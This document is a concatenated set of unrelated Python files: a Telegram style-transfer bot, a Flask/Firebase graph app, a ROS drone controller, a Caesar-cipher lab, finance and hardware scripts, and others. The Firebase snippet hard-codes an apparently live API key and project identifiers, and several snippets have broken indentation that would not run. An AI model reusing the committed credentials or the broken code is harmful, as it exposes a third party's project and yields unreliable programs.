    # Zipf-frequency cutoffs separating the rarity buckets.
    cutoff_rare = 2
    cutoff_uncommon = 4
    cutoff_trite = 5
    # Scoring weights per bucket (not consumed by analyze itself).
    weight_unique = 50
    weight_rare = 10
    weight_uncommon = 1
    weight_trite = -5
    weight_common = 0

    @classmethod
    def setCutoffRare(cls, value):
        cls.cutoff_rare = value

    @classmethod
    def setCutoffUncommon(cls, value):
        cls.cutoff_uncommon = value

    @classmethod
    def setCutoffTrite(cls, value):
        cls.cutoff_trite = value

    @classmethod
    def getFreq(cls, word: str):
        """Validated public wrapper around :meth:`_getFreq`."""
        Test.test("type(word) is str: ", statement=(type(word) is str))
        return cls._getFreq(word)

    @classmethod
    def _getFreq(cls, word: str):
        # Zipf frequency in English; 0 means "not in the database".
        return wordfreq.zipf_frequency(word, "en")

    @classmethod
    def analyze(cls, wordList: list):
        """Count the words of `wordList` falling into each rarity bucket.

        Returns a tuple (unique, rare, uncommon, trite, common).
        """
        unique = rare = uncommon = trite = common = 0
        for word in wordList:
            Test.test("type(word) is str: ",
                      statement=(type(word) is str)
                      )
            freq = cls._getFreq(word)
            if freq == 0:
                unique += 1
            elif freq <= cls.cutoff_rare:
                rare += 1
            elif freq <= cls.cutoff_uncommon:
                uncommon += 1
            elif freq <= cls.cutoff_trite:
                trite += 1
            else:
                common += 1
        return (unique, rare, uncommon, trite, common,)

    @classmethod
    def printAnalysis(cls, wordList: list):
        """Run analyze() and pretty-print the bucket counts."""
        uni, rar, unc, tri, com = cls.analyze(wordList)
        print("unique words: ", uni)
        print("rare words: ", rar)
        print("uncommon words: ", unc)
        print("trite words: ", tri)
        print("common words: ", com)
# end class
if __name__=="__main__":
#print("a" in {"w":1})
TriteWords.enableDebugMode()
TriteWords.enableAssertions()
TriteWords.printAnalysis([
"developer", "develop", "developed", "developing",
"team"
])
TriteWords.printAnalysis([
"worked", "work", "working", "do", "doing"
])
TriteWords.printAnalysis([
"dandy", "dandelion", "dander", "dan",
])
# end if
|
# -*- coding: utf-8 -*-
"""
Created on Tue Jan 12 15:05:57 2021
@author: useren
"""
import logging
from aiogram import Bot, executor, types
from aiogram.dispatcher import Dispatcher
#from aiogram.dispatcher.webhook import SendMessage
from aiogram.contrib.middlewares.logging import LoggingMiddleware
from aiogram.utils.executor import start_webhook
from aiohttp import ClientSession
import aiogram
from aiogram.types import ReplyKeyboardRemove, \
ReplyKeyboardMarkup, KeyboardButton, \
InlineKeyboardMarkup, InlineKeyboardButton
from urllib.parse import urljoin
from PIL import Image
import io
import os
#os.environ['KMP_DUPLICATE_LIB_OK']='TRUE'
from inference import JohnsonMultiStyleNet, make_style
import torch
DEVICE = torch.device('cpu')  # inference runs on CPU only
style_num = 11  # number of styles the model was built with
style_model = JohnsonMultiStyleNet(style_num)
style_model.eval()  # inference mode
# Heuristic: POSIX => deployed (webhook mode, token from env);
# otherwise local development (token read from a file, polling).
webhook_using = False
if os.name == 'posix':
    webhook_using = True
    API_TOKEN = os.getenv('API_TOKEN','123213:SDFSDGSD_ASDKKDF')
else:
    with open('API.TOKEN', 'r') as f:
        API_TOKEN = f.readline().split()[0]
#webhook setting
WEBHOOK_HOST = 'https://telegabot67.heroku.com'
WEBHOOK_PATH = '/webhook/'+API_TOKEN
WEBHOOK_URL = urljoin(WEBHOOK_HOST, WEBHOOK_PATH)
#print(f'wh_url=\n{WEBHOOK_URL}, type({type(WEBHOOK_URL)}) ?\n{WEBHOOK_HOST + WEBHOOK_PATH}')
#webapp setting
if webhook_using:
    WEBAPP_HOST = '0.0.0.0'
    WEBAPP_PORT = os.getenv('PORT')  # port is assigned by the host platform
    print(WEBAPP_PORT)
# Configure logging
logging.basicConfig(level=logging.INFO)
# Initialize bot and dispatcher
bot = Bot(token=API_TOKEN)
dp = Dispatcher(bot)
if webhook_using:
    dp.middleware.setup(LoggingMiddleware())
async def on_startup(dp):
    """Webhook-mode startup: (re)register the webhook URL with Telegram."""
    logging.warning('++++starting webhook')
    # Drop any stale webhook before registering the current URL.
    await bot.delete_webhook()
    await bot.set_webhook(WEBHOOK_URL)
async def on_shutdown(dp):
    """Graceful shutdown: unregister the webhook and close FSM storage."""
    logging.warning('+++Shutting down...')
    await bot.delete_webhook()
    await dp.storage.close()
    await dp.storage.wait_closed()
    logging.warning('+++Bye-bye!')
@dp.message_handler(commands=['start', 'help'])
async def send_welcome(message: types.Message):
    """Reply to /start and /help (includes os.name for deployment debugging)."""
    await message.reply(f"Hi!\nI'm EchoBot!\nos.name={os.name}")
@dp.message_handler()
async def echo(message: types.Message):
    """Catch-all message handler: stylizes the bundled test.jpg and replies.

    NOTE(review): despite the name, this never echoes the user's text —
    it always styles the local 'test.jpg'; looks like leftover debug
    behavior. Confirm before shipping.
    """
    mes_to_answ = ''
    mes_to_answ += ' date: ' + str(message.date)  # built but never sent
    #await message.answer(mes_to_answ)
    #assert False, f'{message.text}'
    img = Image.open('test.jpg')
    #style_choice = 0
    fp = io.BytesIO()
    # Run the style model and send the result as an in-memory JPEG.
    Image.fromarray(make_style(img, style_model)).save(fp, 'JPEG')
    await bot.send_photo(message.from_user.id, fp.getvalue(),
                         reply_to_message_id=message.message_id)
@dp.message_handler(content_types=['photo'])
async def photo_reply(message: types.Message):
    """Stylize an incoming photo and send the result back.

    The optional style index is the first number found in the photo
    caption; otherwise the model's default style is used.
    """
    fpin = io.BytesIO()
    fpout = io.BytesIO()
    await message.answer('I got your photo, wait for stylization...')
    # The last entry of message.photo is the highest-resolution version.
    await message.photo[-1].download(fpin)
    style_num = None
    # Photo messages carry user text in `caption`, not `text` (which is
    # None for photos), and str has isdigit(), not is_digits() — both
    # bugs made style selection dead code in the original.
    caption = message.caption or ''
    digits = [word for word in caption.split() if word.isdigit()]
    if digits:
        style_num = int(digits[0]) % style_model.get_style_number()
    img = Image.open(fpin)
    styled = make_style(img, style_model, style_num)
    Image.fromarray(styled).save(fpout, 'JPEG')
    await bot.send_photo(message.from_user.id, fpout.getvalue(),
                         reply_to_message_id=message.message_id)
#def test(img, style_choice=0):
    #img = Image.open(r'test.jpg')
    #plt.imshow(img)
#    img_t = transform_inference(img).unsqueeze(0)
#    with torch.no_grad():
#        styled = style_model(img_t, style_choice)
#    return recover_image(styled.detach().cpu().numpy())[0]
if __name__ == '__main__':
    if webhook_using:
        # Deployed: serve Telegram updates over the registered webhook.
        logging.warning(f'---->trying start webhook:{WEBHOOK_PATH}, {WEBAPP_HOST}, {WEBAPP_PORT}')
        start_webhook(dispatcher=dp,
                      webhook_path=WEBHOOK_PATH,
                      on_startup=on_startup,
                      on_shutdown=on_shutdown,
                      skip_updates=True,
                      host=WEBAPP_HOST,
                      port=WEBAPP_PORT)
    else:
        # Local development: long polling instead of a webhook.
        executor.start_polling(dp, skip_updates=True)
|
from astropy.io import ascii
import numpy as np
#rc3=ascii.read("/Users/dhk/work/cat/NGC_IC/myrc3.dat")
irac1_gals = []
cnt = 0
# Scan the 14 SHA mosaic query result tables and collect the galaxy
# names (column 0) of rows observed in the IRAC1 band (column 10).
for x in range(0, 14):
    data = ascii.read("/Users/dhk/work/cat/NGC_IC/SHA_mosaic_quarry_result_%d.tbl" % (x), format='ipac')
    tmp = ""
    for y in range(0, len(data)):
        if data[y][10] == 'IRAC1':
            # if y == 0 and data[y][0].upper() in rc3['name']:
            # Record each name once per consecutive run (the original had
            # two identical branches for "first entry" and "name changed").
            if tmp == "" or data[y][0] != tmp:
                tmp = data[y][0]
                cnt = cnt + 1
                irac1_gals.append(tmp)
print(cnt)
# `with` guarantees the output file is flushed and closed (the original
# never closed the handle).
with open('irac1_gals.txt', 'w') as thefile:
    for item in irac1_gals:
        thefile.write("%s\n" % item)
|
import networkx as nx
import community
import numpy as np
import pyrebase
from flask import *
import json
#import firebase_admin
#from firebase_admin import credentials
#cred = credentials.Certificate("key.json")
#firebase_admin.initialize_app(cred)
# Firebase project configuration.
# NOTE(review): the API key and project credentials are committed in
# plain text — move them to environment variables before publishing.
config = {
    "apiKey": "AIzaSyA7N3W1eqC00CnLi4KZtIly-z5PD3fWDDo",
    "authDomain": "rejoelusion.firebaseapp.com",
    "databaseURL": "https://rejoelusion.firebaseio.com",
    "projectId": "rejoelusion",
    "storageBucket": "rejoelusion.appspot.com",
    "messagingSenderId": "981870293946",
    "appId": "1:981870293946:web:23a62d3fdac5ca2e89a383",
    "measurementId": "G-E7N4B5JGCP"
}
firebase = pyrebase.initialize_app (config)
db = firebase.database()
# Debug dump at startup: print the "ami" field of every user record.
all_users = db.child("Users").get()
for user in all_users.each():
    #print(user.key())
    #print(user.val())
    #python_dict = json.dumps(str(user.val()))
    #print(python_dict)
    if user.val() is not None:
        #hereeeeee to
        # NOTE(review): assumes every non-empty record has an "ami" key —
        # KeyError otherwise. Confirm the schema.
        print(user.val()["ami"])
app = Flask(__name__)
@app.route("/")
def hello_world():
return "Welcome to PACT 4.2 Drink'O'Neccted!"
@app.route('/community')
def count_community():
    """Return user 2's Louvain community as a JSON response."""
    return jsonify(louvain())
def louvain():
    """Build a random 10-node friendship graph, run Louvain community
    detection, and return user 2's community as a JSON string.

    Returns None when node 2 ended up with no edges (not in the graph).
    """
    matrix = np.zeros((10, 10))
    for i in range(len(matrix)):
        for j in range(len(matrix)):
            if i == j:
                matrix[i, j] = 0  # can't be friend with yourself
                # (the original zeroed the diagonal and then immediately
                # overwrote it with a random value when j == i)
            else:
                matrix[i, j] = np.random.randint(low=0, high=2)  # randomly be friends with someone else
    graphPACT = nx.Graph()
    for i in range(len(matrix)):
        for j in range(len(matrix)):
            if matrix[i, j] == 1:
                graphPACT.add_edges_from([(i, j)])
    # first compute the best partition
    partitionPACT = community.best_partition(graphPACT)
    kom = None  # stays None if node 2 is absent (avoids UnboundLocalError)
    for k in partitionPACT:
        # `is 2` compared object identity and only worked thanks to
        # CPython's small-int caching; use value equality.
        if k == 2:
            kom = '{"User": ' + str(k) + ', "Community": ' + str(partitionPACT[k]) + '}'
    return kom
|
class MissingColumnAssembler:
    """Compute, per table, the source columns absent from the destination."""

    def populate(self, dto):
        """Fill dto.missingColumns for every comparable table."""
        missing_by_table = {}
        for table in dto.sourceTables:
            # Excluded or entirely-missing tables are handled elsewhere.
            if table in dto.excludedTables or table in dto.missingTables:
                continue
            src_cols = dto.sourceInspector.get_columns(table)
            dst_cols = dto.destInspector.get_columns(table)
            gaps = self._missingColumns(src_cols, dst_cols)
            if gaps:
                missing_by_table[table] = gaps
        dto.missingColumns = missing_by_table

    def _missingColumns(self, sourceColumns, destColumns):
        """Names of source columns with no same-named destination column."""
        return [col['name'] for col in sourceColumns
                if not self._columnExist(col['name'], destColumns)]

    def _columnExist(self, columnName, columns):
        """Return the matching column dict, or False when absent."""
        for candidate in columns:
            if candidate['name'] == columnName:
                return candidate
        return False
|
import time
import serial
class LockBox(object):
    """Serial-port front-end for a lock-box instrument.

    If the port cannot be opened, self.ser is None and later commands
    will fail with AttributeError (there is no reconnect logic).
    """
    def __init__(self,comPort='com13'):
        try:
            self.ser = ser = serial.Serial()
            ser.port = comPort
            ser.timeout = 5
            # DTR is held low before opening — presumably to avoid
            # resetting the attached device; confirm with the hardware.
            ser.setDTR(False)
            ser.open()
        except serial.serialutil.SerialException:
            #no serial connection
            self.ser = None
        else:
            pass
    def __del__(self):
        # Close the port when the object is garbage collected.
        if self.ser:
            self.ser.close()
    def send(self, command):
        # NOTE(review): writes a str; pyserial 3+ requires bytes — this
        # looks Python-2 era. Verify before porting to Python 3.
        self.ser.write(command+"\r\n")
    def query(self, command):
        """Send `command` and return the reply minus the trailing CRLF."""
        self.send(command)
        time.sleep(0.020)  # give the instrument time to respond
        return self.ser.readline()[:-2]
    @property
    def lock(self):
        # "LOCK?" replies "0"/"1"; convert to bool.
        return bool(int(self.query("LOCK?")))
    @lock.setter
    def lock(self,state):
        if state:
            self.send("ON")
        else: self.send("OFF")
if __name__=='__main__':
    # Smoke test: construct the box (implicitly tries to open the port).
    lockBox = LockBox()
import time
import math
import statistics as stats
import market.parser as parser
'''
@summary: This method goes through every symbols and obtains the following indicators for the time period and interval: Beta, Sharpe ratio, year low, year high, ...
@param symbolsList: An array of symbols i.e. ['BB.TO', 'SIO.V', ...]
@param fromDate: Format should be [month, day, year]
@param toDate: Format should be [month, day, year]
@param interval: d -> day, w -> week
@return: i.e. {"BB.TO": [<beta>, <Sharpe ratio>, <year low>, <year high>], ...}
'''
def getStatsForSymbols(symbolsList, fromDate, toDate, interval='d'):
    """Fetch Beta, Sharpe ratio and 52-week low/high for each symbol.

    symbolsList: ticker symbols, e.g. ['BB.TO', 'SIO.V'].
    fromDate/toDate: [month, day, year] lists.
    interval: 'd' for daily, 'w' for weekly EOD data.
    Returns {symbol: {"Beta": ..., "Sharpe_Ratio": ..., "Year_Low": ...,
    "Year_High": ...}, ...}.
    """
    result = {}
    for symb in symbolsList:
        print("Getting data for " + symb)
        # End-of-day price history for the Sharpe-ratio calculation.
        dp = parser.YahooDataProvider(1, symb, parser.BASE_URL_YAHOO_EOD, fromDate, toDate, interval)
        eodData = dp.getEODData()
        # Intraday quote gives the 52-week range.
        dp = parser.YahooDataProvider(0, symb, parser.BASE_URL_YAHOO_INTRADAY,
                                      {"year_low":parser.YahooDataProvider.YAHOO_QUOTE_PROPERTY_MAP["year_low"],
                                       "year_high":parser.YahooDataProvider.YAHOO_QUOTE_PROPERTY_MAP["year_high"]})
        intradayInfo = dp.getIntraDayData()
        # Get the indicators
        print("Getting indicators for " + symb)
        tmxSymb = parser.convertFromYahooToTMXSymbol(symb)
        beta = parser.extractBetaForSymbol(parser.BASE_URL_TMX, tmxSymb, parser.REGEX1_FOR_BETA_FROM_TMX, parser.REGEX2_FOR_BETA_FROM_TMX)
        sharpeRatio = 'NaN'
        # Need at least 3 prices (2 returns) for a meaningful stdev.
        if (len(eodData) > 0 and len(eodData['Adj Close']) >= 3):
            sharpeRatio = calculateSharpeRatio(eodData['Adj Close'], 0)
        yearLow = intradayInfo["year_low"]
        yearHigh = intradayInfo["year_high"]
        # Put all the data in result
        result[symb] = {"Beta": beta, "Sharpe_Ratio": sharpeRatio, "Year_Low": yearLow, "Year_High": yearHigh}
        # Don't hit the server too often too fast
        time.sleep(2)
    print(result)
    return result
def calculateSharpeRatio(inputPrices, riskFreeRate, k=250):
    """Annualized Sharpe ratio of a chronological price series.

    inputPrices: prices in time order (at least 2 points required).
    riskFreeRate: per-period risk-free return to subtract.
    k: periods per year used for annualization (250 trading days).
    Returns the string 'NaN' (legacy sentinel kept for callers) when the
    return series has zero variance.
    """
    # Simple period-over-period returns, pairwise over the series.
    returns = [float(curr) / float(prev) - 1
               for prev, curr in zip(inputPrices, inputPrices[1:])]
    meanReturn = stats.mean(returns)
    stdOfReturn = stats.stdev(returns)
    # stats.stdev never returns the string 'NaN' (the original's check
    # for it was dead code); only zero variance is undefined here.
    if stdOfReturn == 0:
        return 'NaN'
    return math.sqrt(k) * ((meanReturn - riskFreeRate) / stdOfReturn)
def getStatsForSymbolsOnPage(url, regex1, regex2, fromDate, toDate, interval='d'):
    """Scrape symbols from `url` (suffixing '.V') and fetch their stats.

    fromDate/toDate are comma-separated strings, e.g. "1,1,2020".
    """
    print('Calling extractSymbolsFromWebsite')
    symbols = parser.extractSymbolsFromWebsite(url, regex1, regex2, '.V')
    print(symbols)
    retResult = getStatsForSymbols(symbols, fromDate.split(','), toDate.split(','), interval)
    return retResult
|
# Demonstration of rebinding: beta/charlie capture alpha's value at
# assignment time; later rebindings of alpha do not affect them.
alpha = 9
print("a= ", alpha)
beta = alpha + 10      # 9 + 10 = 19
alpha = 4
charlie = 23 + beta    # 23 + 19 = 42
alpha = 70
print("a= ", alpha)
print("beta: ", beta)
print(charlie)
# The original ended with a bare `exit` — an expression naming the
# builtin without calling it, i.e. a silent no-op. Removed; the script
# simply ends here.
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
"""
from __future__ import absolute_import
import ast
import os
import subprocess
def check_celery_task_func_def_changed():
    """Find celery task functions whose definitions changed vs. master.

    Diffs the working tree against `master` and inspects every changed
    tasks.py module.
    """
    result = subprocess.run(["git", "diff", "master", "--name-only"],
                            capture_output=True, text=True)
    for filename in result.stdout.split('\n'):
        # The original's second `.endswith('.py')` test was redundant:
        # every 'tasks.py' path already ends with '.py'.
        if filename.endswith('tasks.py'):
            _check_celery_task_file(filename)
def _check_celery_task_file(filename):
    """Return the names of @task/@periodic_task functions in `filename`
    whose `def` line appears in the current git diff (None when none do)."""
    print(filename)
    # `with` closes the file even if parsing raises (the original leaked
    # the handle).
    with open(os.path.abspath(filename), 'r') as r:
        tree = ast.parse(r.read())
    func_name_changed = []
    task_def_changed = _get_func_names_which_changed()
    for stmt in ast.walk(tree):
        if not isinstance(stmt, ast.FunctionDef):
            continue
        for decorator in stmt.decorator_list:
            # A decorator is either bare (`@task` -> ast.Name) or called
            # (`@task(...)` -> ast.Call); the original crashed on the bare
            # form because ast.Name has no `.func` attribute.
            target = decorator.func if isinstance(decorator, ast.Call) else decorator
            if (
                isinstance(target, ast.Name)
                and target.id in ['task', 'periodic_task']
                and stmt.name in task_def_changed
            ):
                func_name_changed.append(stmt.name)
    if func_name_changed:
        return func_name_changed
def _get_func_names_which_changed():
    """
    Command:
        git diff --color=always | grep 'def' | cut -d " " -f2 | cut -d "(" -f1 | sort | uniq
    Output:
        ["func_name_1", "func_name_2"]
    """
    # The original ran a first `git diff` + `grep` pair whose results were
    # immediately overwritten by the pair below — dead work, removed.
    git_diff = subprocess.run(['git', 'diff', '--color=always'], check=True, capture_output=True)
    func_names = subprocess.run(['grep', 'def'], input=git_diff.stdout, capture_output=True)
    # Strip everything before the name and after the '(' of each def line.
    replace_space = subprocess.run(['cut', '-d', ' ', '-f2'], input=func_names.stdout, capture_output=True)
    replace_bracket = subprocess.run(['cut', '-d', '(', '-f1'], input=replace_space.stdout, capture_output=True)
    sort_names = subprocess.run(['sort'], input=replace_bracket.stdout, capture_output=True)
    uniq_names = subprocess.run(['uniq'], input=sort_names.stdout, capture_output=True)
    return uniq_names.stdout.decode('utf-8').split('\n')
check_celery_task_func_def_changed()
|
'''
Advanced Security
Lab 2
Jonathan Riordan
C13432152
Part 1
Key = -3
Message = "And I shall remain satisfied, and proud to have been the first who has ever enjoyed the fruit of his writings as fully as he could desire; for my desire has been no other than to deliver over to the detestation of mankind the false and foolish tales of the books of chivalry, which, thanks to that of my true Don Quixote, are even now tottering, and doubtless doomed to fall for ever. Farewell."
Cipher text: Xka F pexii objxfk pxqfpcfba, xka molra ql exsb ybbk qeb cfopq tel exp bsbo bkglvba qeb corfq lc efp tofqfkdp xp criiv xp eb zlria abpfob clo jv abpfob exp ybbk kl lqebo qexk ql abifsbo lsbo ql qeb abqbpqxqflk lc jxkhfka qeb cxipb xka cllifpe qxibp lc qeb yllhp lc zefsxiov, tefze, qexkhp ql qexq lc jv qorb Alk Nrfulqb, xob bsbk klt qlqqbofkd, xka alryqibpp alljba ql cxii clo bsbo. Cxobtbii.
'''
key = -3
message = "And I shall remain satisfied, and proud to have been the first who has ever enjoyed the fruit of his writings as fully as he could desire; for my desire has been no other than to deliver over to the detestation of mankind the false and foolish tales of the books of chivalry, which, thanks to that of my true Don Quixote, are even now tottering, and doubtless doomed to fall for ever. Farewell."
alphaLower = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']
alphaUpper = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z']
def encrypt(plaintext, key, arraylower, arrayupper):
    """Caesar-shift *plaintext* by *key* positions and return the cipher text.

    Lowercase and uppercase letters are shifted within their own 26-entry
    alphabet (arraylower / arrayupper).  The characters ',', '.', '!' and
    spaces pass through unchanged; every other character is dropped,
    matching the original behaviour.

    Improvement: the original single-subtraction wrap only handled shifts
    in -26..25 (larger keys produced out-of-range indices); modular
    arithmetic generalises it to any integer key.  The stray string
    initialiser `remainder = "0"` is gone.
    """
    cipherText = ""
    for ch in plaintext:
        if ch in arraylower:
            # % 26 wraps both positive and negative shifts correctly.
            cipherText += arraylower[(arraylower.index(ch) + key) % 26]
        elif ch in arrayupper:
            cipherText += arrayupper[(arrayupper.index(ch) + key) % 26]
        elif ch in (",", ".", "!", " "):
            # Punctuation/whitespace preserved verbatim.
            cipherText += ch
    return cipherText
# Encrypt the lab message and show the result.
cipherText = encrypt(message, key, alphaLower, alphaUpper)
# Bug fix: the original used the Python 2 print *statement*
# (`print cipherText`), which is a SyntaxError under Python 3.
print(cipherText)
|
from time import sleep
from picamera import PiCamera
from pynput import keyboard
from datetime import datetime
# Capture configuration.
TIME_LAPSE = 5 # Seconds between time-lapse shots
TIME_LAPSE_PICTURES = 10 # Number of pictures to snap per time lapse
BURST = 5 # Number of pics to take in burst mode (take_burst is still a stub)
PATH = "/home/pi/Desktop/Picamera/captured/" # Destination directory for captures
# NOTE: requires Raspberry Pi camera hardware at import time.
cam = PiCamera()
cam.resolution = (1024, 768)
def take_pic():
    """Capture one timestamped JPEG into PATH using the global camera."""
    global cam, PATH
    stamp = datetime.now().strftime("%m-%d-%Y-%H:%M:%S")
    file_name = stamp + ".jpg"
    print(file_name)
    cam.start_preview()
    sleep(2)  # give the sensor a moment to adjust exposure
    cam.capture(PATH + file_name)
    cam.stop_preview()
def take_burst():
    # TODO: unimplemented stub -- intended to take BURST consecutive shots.
    pass
def time_lapse():
    """Capture TIME_LAPSE_PICTURES shots, TIME_LAPSE seconds apart.

    Bug fix: the original computed a per-run folder path every iteration but
    then captured to '/{0:04d}.jpg' (the filesystem root), ignoring it.  The
    folder is now created once per run and the shots are saved into it, as
    the original comment intended.
    """
    import os
    now = datetime.now()
    new_directory = now.strftime("%m-%d-%Y-%H:%M") #each time lapse set gets its own folder
    file_path = PATH + new_directory
    os.makedirs(file_path, exist_ok=True)
    for i in range(TIME_LAPSE_PICTURES):
        sleep(TIME_LAPSE)
        cam.capture('{0}/{1:04d}.jpg'.format(file_path, i + 1))
        print("shot {} taken".format(i + 1))
def on_press(key):
    """Keyboard handler: 't' starts a time lapse, space takes one picture.

    Bug fixes: special keys (space, enter, ...) are Key enum members with no
    .char attribute, so the original raised AttributeError on `key.char`
    before ever reaching its space check -- and that space check was nested
    under the has-char branch, making it unreachable.
    """
    if hasattr(key, 'char'):
        if key.char == 't':
            print("time lapse")
            time_lapse()
    elif key == keyboard.Key.space:
        take_pic()
# Start listening for key presses and block until the listener stops.
listener = keyboard.Listener(on_press=on_press)
listener.start()
# Fix: the original spun in `while True: pass`, pinning a CPU core at 100%;
# joining the listener thread blocks just as effectively at zero cost.
listener.join()
#!/usr/bin/env python
import rospy
from std_msgs.msg import String, Empty
from geometry_msgs.msg import Twist
from sensor_msgs.msg import Joy
from drone_control.srv import Mode, ModeResponse
class control:
    """Joystick teleoperation node for a Parrot Bebop drone.

    Subscribes to 'joy' and publishes Twist velocity commands plus
    takeoff/land/reset signals; button 9 toggles between 'loisir' (manual
    joystick) and 'surveillance' (constant rotation) modes via two ROS
    services.
    """
    # NOTE(review): this class attribute is never read in the class; the
    # active mode is tracked by self.mode_current instead.
    survey_mode=False
    def __init__(self):
        """Set up the node, publishers, subscriber and mode services, then
        block in rospy.spin() until shutdown."""
        # In ROS, nodes are uniquely named. If two nodes with the same
        # name are launched, the previous one is kicked off. The
        # anonymous=True flag means that rospy will choose a unique
        # name for our 'listener' node so that multiple listeners can
        # run simultaneously
        rospy.init_node('listener_control', anonymous=True)
        self.pub_vel = rospy.Publisher('bebop/cmd_vel', Twist, queue_size=10) # create publisher on bebop/cmd_vel
        self.pub_takeoff = rospy.Publisher('bebop/takeoff', Empty, queue_size=10) #create_publisher on bebop/takeoff
        self.pub_land = rospy.Publisher('bebop/land', Empty, queue_size=10) #create_publisher on bebop/land
        self.pub_reset = rospy.Publisher('bebop/reset', Empty, queue_size=10) #create_publisher on bebop/reset
        self.sub= rospy.Subscriber('joy', Joy, self.callback) #subscribe to joy
        # True = 'loisir' (manual joystick) mode, False = 'surveillance'.
        self.mode_current = True
        self.service1 = rospy.Service('ServiceSurveillance', Mode, self.callback_Surveillance) #create Surveillance service
        self.service2 = rospy.Service('ServiceLoisir', Mode, self.callback_Loisir) #create loisir service
        rospy.loginfo("[controller] started...")
        # spin() simply keeps python from exiting until this node is stopped
        rospy.spin()
    def callback(self,data):
        """Handle one Joy message: mode toggling, takeoff/land/reset buttons
        and the velocity command publication."""
        rospy.loginfo(rospy.get_caller_id() + 'I heard '+ str(data.axes))
        #if the button 9 is pressed and the current mod is loisir, the drone switch on surveillance mode
        if data.buttons[9]==1 and self.mode_current == True:
            surveillance = rospy.ServiceProxy('ServiceSurveillance', Mode)
            response_surveillance = surveillance()
            self.mode_current = response_surveillance.srv_rep
        #if the button 9 is pressed and the current mod is surveillance, the drone switch on loisir mode
        elif data.buttons[9]==1 and self.mode_current == False:
            loisir = rospy.ServiceProxy('ServiceLoisir', Mode)
            response_loisir = loisir()
            self.mode_current = response_loisir.srv_rep
        #if the button 7 is pressed, reset the drone
        if data.buttons[7]==1:
            self.pub_reset.publish()
            rospy.loginfo(rospy.get_caller_id() +'send reset')
        #if button 2 is pressed, land the drone
        if data.buttons[2]==1:
            self.pub_land.publish()
            rospy.loginfo(rospy.get_caller_id() +'send land')
        #if button 0 is pressed, takeoff the drone
        if data.buttons[0]==1:
            self.pub_takeoff.publish()
            rospy.loginfo(rospy.get_caller_id() +'send takeoff')
        Vel_msg= Twist()
        if self.mode_current==True:
            #joystick control
            Vel_msg.linear.x=data.axes[1]/4 #axes index 1: left stick (up-down)
            Vel_msg.linear.y=data.axes[0]/4 #axes index 0: left stick (left-right)
            Vel_msg.linear.z=data.axes[4]/4 #axes index 4: right stick (up-down)
            Vel_msg.angular.z=data.axes[3] #axes index 3: right stick (left-right)
        else:
            #if surveillance mode is active start rotating
            Vel_msg.angular.z=0.294 #to turn at 0.5 rad/s
        self.pub_vel.publish(Vel_msg)
    def callback_Surveillance(self,req):
        # Service handler: rospy packs this bare bool into the Mode response.
        # NOTE(review): presumably Mode's response has a single bool field
        # (srv_rep, read above) -- confirm against Mode.srv.
        return False
    def callback_Loisir(self,req):
        # Service handler: True -> caller sets mode_current=True (manual mode).
        return True
class control_service:
    """Standalone ROS node exposing 'Send_Srv_Control'; each call is relayed
    to the 'Send_Srv_Cmd' service and its reply mapped to a ModeResponse."""
    def __init__(self):
        rospy.init_node('surveillance_server',anonymous=False)
        self.s = rospy.Service('Send_Srv_Control', Mode, self.callback) # create servie named Send_Src_Control
        print("Ready to control mode")
        rospy.spin()
    def callback(self,req):
        """Relay the request to 'Send_Srv_Cmd' and translate the reply.

        Bug fixes: the original built the ServiceProxy but never invoked it
        (`resp1 = Mode()` instantiated the service *type*, not a reply), so
        `resp1 == True` was always False; and on a ServiceException resp1
        stayed unbound, crashing the handler.
        """
        print("changing mode")
        rospy.wait_for_service('Send_Srv_Cmd')
        try:
            call_resp_Mode = rospy.ServiceProxy('Send_Srv_Cmd', Mode)
            resp1 = call_resp_Mode()  # actually perform the remote call
        except rospy.ServiceException as e:
            print("Service call failed: %s"%e)
            return ModeResponse(False)
        # Mirror the remote reply's bool field onto our own response.
        return ModeResponse(bool(resp1.srv_rep))
if __name__ == '__main__':
    try:
        # NOTE(review): control() blocks inside rospy.spin() until shutdown,
        # so control_service() only runs after the first node exits --
        # confirm whether both nodes were meant to run concurrently.
        control()
        control_service()
    except rospy.ROSInterruptException:
        pass
#!/usr/bin/env python
# coding: utf-8
# In[ ]:
## 아래는 실제 트레인 과정 입니다.
# In[1]:
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
from torch.utils.data import Dataset, DataLoader
from torchvision import datasets, transforms
import numpy as np
import torch.optim as optim
import pandas as pd
from pandas import DataFrame, Series
import csv
from random import randrange
# In[2]:
def load_data_real():
    """Read data.csv and return (features, labels, row_count).

    Each feature row holds the 13 survey/MBTI columns in fixed order; each
    label is a single-element list holding that row's 'job' value.
    """
    df = pd.read_csv('data.csv', error_bad_lines=False)
    feature_columns = ['mok', 'hwa', 'to', 'gm', 'su',
                       'E', 'I', 'S', 'N', 'T', 'F', 'J', 'P']
    length = len(df['mok'])
    data = []
    job = []
    for i in range(length):
        data.append([df[column][i] for column in feature_columns])
        job.append([df['job'][i]])
    return data, job, length
# In[3]:
class myDataset(Dataset):
    """Minimal torch Dataset over parallel feature/label sequences."""
    def __init__(self, features, label):
        self.features = features
        self.label = label
        self.len = len(label)
        # Sorted, de-duplicated label values; list index == stable label id.
        self.label_list = sorted(set(label))
    def __getitem__(self, index):
        return self.features[index], self.label[index]
    def __len__(self):
        return self.len
    def get_labels(self):
        """All distinct label values, sorted."""
        return self.label_list
    def get_label(self, id):
        """Label value for a numeric id."""
        return self.label_list[id]
    def get_label_id(self,label):
        """Numeric id of a label value."""
        return self.label_list.index(label)
# In[4]:
# Hyper-parameters.
BATCH_SIZE = 16
epochs = 50
data, label, length = load_data_real()
#label indexing
# Build a label -> integer-id vocabulary.
# NOTE(review): iterating a set makes the id assignment order-dependent on
# hashing -- persist label_vocab if the saved model is reloaded elsewhere.
vocab = set()
vocab_label = np.array(label)
vocab.update(vocab_label.flatten())
label_vocab = {word:i for i, word in enumerate(vocab)}
print(label_vocab)
final_label = []
for index, label_ in enumerate(label):
    final_label.append([label_vocab[label_[0]]])
# Features as float32, labels flattened to a 1-D id vector.
data = np.array(data, dtype=np.float32)
final_label = np.array(final_label, dtype=np.float64)
final_label = final_label.flatten()
